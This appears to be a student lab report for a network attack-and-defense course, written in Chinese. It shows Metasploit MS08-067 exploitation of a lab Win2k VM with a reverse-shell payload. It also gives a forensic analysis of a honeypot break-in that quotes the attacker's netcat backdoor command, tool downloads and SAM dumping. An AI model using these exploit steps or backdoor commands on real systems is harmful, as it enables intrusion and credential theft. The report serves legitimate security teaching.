20252801 2025-2026-2 《网络攻防实践》第6次作业

1.实践内容

（1）动手实践Metasploit windows attacker
任务：使用metasploit软件进行windows远程渗透统计实验
具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

（2）取证分析实践：解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么

（3）团队对抗实践：windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

2.实践过程

2.1 动手实践Metasploit windows attacker

动手实践Metasploit windows attacker
（1）任务：使用metasploit软件进行windows远程渗透统计实验；
（2）具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权。

查看kali攻击机的IP地址为：192.168.200.6:

查看Win2k靶机的IP地址为：192.168.200.130：

首先在kali打开metasploit，输入命令行msfconsole进入启动msfconsole，回车后就会进入到其控制台界面；

输入命令行search ms08_067查看漏洞ms08_067详细信息，可以看到，这是针对这个漏洞的渗透攻击模块；

输入use windows/smb/ms08_067_netapi进入漏洞所在文件，输入show options查看攻击此漏洞需要的设置；

输入命令行show payloads查看有效的攻击载荷，选择第4个载荷 payload generic/shell_reverse_tcp 进行攻击；

输入命令行 set payload generic/shell_reverse_tcp 设置攻击的载荷为tcp的反向连接；
输入命令行set RHOST 192.168.200.130设置渗透攻击的靶机IP，输入set LHOST 192.168.200.6设置渗透攻击的主机是kali；(ignore my fault QAQ)

输入exploit进行渗透攻击，出现会话连接即攻击成功；

取证分析实践：解码一次成功的NT系统破解攻击
任务：来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。

（1）攻击者使用了什么破解工具进行攻击？
用wireshark打开学习通（zip文件里面）上的.log文件，可以看到非常多的报文，里面有可识别的http协议内容、可识别的sql语句代码内容、可识别的系统操作代码内容和不可识别的二进制数据。先进行筛选，使用ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http过滤数据包；

点开117数据包，发现攻击者访问了boot.ini文件，同时%C0%AF字符为/的Unicode编码，可以分析得到为Unicode攻击。

随后观察到编号130和编号140中攻击者试图向服务器获取msadcs.dll文件，针对msadcs.dll中RDS漏洞（MS02-065）的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。

右键149数据包TCP数据流，追踪tcp，找到特殊字符%C0%AF。查询百度可知，发现 %C0%AF 为Unicode编码，由此判断攻击者进行了Unicode攻击以打开boot.ini文件，因此存在Unicode漏洞攻击；

在过滤后的数据包中发现多次出现msadcs.dll，对其中的149号数据包进行追踪，查看发现有shell语句(执行了命令cmd /c echo werd >> c : fun)和频繁出现的"!ADM!ROX!YOUR!WORLD!"字符串，上网搜索可知，攻击者使用RDS漏洞进行了SQL注入攻击。该漏洞可以导致攻击者远程执行用户系统的命令，并以设备用户的身份运行，查询资料可知是由msadc.pl/msadc2.pl 渗透攻击工具发起的攻击。

（2）攻击者如何使用这个破解工具进入并控制了系统？
追踪多个数据包查看shell语句，可以看到攻击者使用IIS Unicode漏洞进入靶机之后，利用其msadcs.dll中的RDS漏洞允许任意代码执行的缺陷进行以下操作；由ftpcom可知攻击机打开213.116.251.162的主机后，使用FTP的方式下载文件，其中pdump.exe和samdump.dll是配合使用破解口令的，即使用samdump.dll拿到口令后再用pdump.exe进行破解；

继续追踪多个数据包查看shell语句，其中sasfile为高效读入数据的方式，因此IP分别为212.139.12.26和213.116.251.162写入了文件。nc.exe文件是一个远程入侵的后门程序，便于下次攻击；
（图有点多，因步骤都是按照视频按部就班地来，遂直接照搬学习通视频步骤并参考借鉴往届前辈的作业，如有雷同，纯属巧合）

接下来使用http.request.uri contains "msadc"进行筛选，可以看到攻击机成功上传了工具

使用ftp进行过滤，在1106号数据包可以发现攻击者成功建立了FTP连接，追踪TCP流，可以看出到攻击者通过创建了ftpcom脚本，使用ftp连接http://www.nether.net/，并以用户名：johna2k，密码：haxedj00，下载 nc.exe、pdump.exe和samdump.dll；

在1233号数据包中，发现攻击者执行了命令"c+nc±l±p+6969±e+cmd1.exe"，表示攻击者连接了6969端口并且获得了访问权限，上网搜索可知木马程序会使用 6969 端口进行通信和攻击；

（3）攻击者获得系统访问权限后做了什么？
继续追踪多个数据包查看shell语句，可以看到攻击机进入靶机后查看了一些系统文件，注意关键字ProgramFiles；然后创建会话写入文件yay.txt，注意到前面有pdump.exe，这是上一步提到的口令破解文件，因此猜测创建的会话将破解的口令写入文件yay.txt中；

接着，可以看到ADD，意味着创建用户组提升自己的访问权限；

利用磁盘修复工具包中的rdisk工具创建SAM文件副本（SAM文件中是安全账号管理），可以发现攻击的口令来来回回执行了好多次，猜测这个攻击者这部操作不是很顺利；

在5766号数据包中，可以看到执行指令“c+del+ftpcom HTTP/1.1”删除了ftp的文件，猜测攻击者删除之前下载文件准备逃跑；

然后在3527号和4030号数据包中可以发现攻击者尝试删除和拷贝SAM文件中的数据即har.txt文件。

（4）我们如何防止这样的攻击？
1）限制网络用户访问和调用CMD命令的权限；
2）使用 IIS Lockdown 和 URLScan 等工具；
3）自身的口令要是强口令，这样可以增大破解口令难度；
4）定期打补丁，修补漏洞（比如：RDS和Unicode漏洞）；
5）定期扫描自身的主机，查看是否存在漏洞等危险。

（5）你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？
查看4351号数据包的TCP数据流，可以看到攻击者警觉到了他的目标是一台蜜罐主机，因为攻击者写下了这是他见过的最好的蜜罐；

团队对抗实践：windows系统远程渗透攻击和分析
（1）实验环境
攻击机Kali：192.168.200.6（20252801叶姜祺）
靶机Win2k：192.168.200.130（20252821刘铭洋）
利用漏洞：MS08-067漏洞
首先先把VMnet0桥接模式的外部连接修改成本地网卡，使得两个主机可以在同一个网段中

查询我的KaliのIP：

查询靶机のIP：

测试连通性：

（2）具体过程
进行第一个实验的相同步骤，进行攻击，过程如下：

出现会话，可以看到攻击成功，接着创建文件YJQ，在刘铭洋的win2k虚拟机192.168.200.130上发现名为YJQ的文件夹。

攻击时在攻击机kali开启wireshark监听，通过tcp流分析攻击行为，可见攻击行为均被捕获。
![image](https://img2024.cnblogs.com/blog/3570004/202604/3570004-20260414172